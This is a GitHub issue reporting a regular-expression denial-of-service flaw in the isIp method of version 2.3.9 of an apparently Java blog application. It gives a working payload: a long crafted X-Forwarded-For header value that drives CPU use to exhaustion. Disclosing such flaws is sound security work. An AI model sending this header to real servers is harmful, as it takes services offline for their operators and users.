There is a denial of service vulnerability affecting the latest version 2.3.9 #35
Comments
hacker-wp
changed the title
hacker-wp
changed the title
hacker-wp
changed the title
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
This vulnerability can lead to a denial of service problem. The application uses regular expressions to match when processing IP addresses, but there are serious vulnerabilities in regular expressions. Attackers can directly pass in specially constructed characters to cause repeated and infinite regular expression matches, which will consume all CPU performance and lead to a denial of service.
Just need to modify the X-Forwarded-for in the http request header:
X-Forwarded-For:5::6:6:5:36:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A
com.zyd.blog.util.RegexUtils.java public static boolean isIp(String ip)
The text was updated successfully, but these errors were encountered: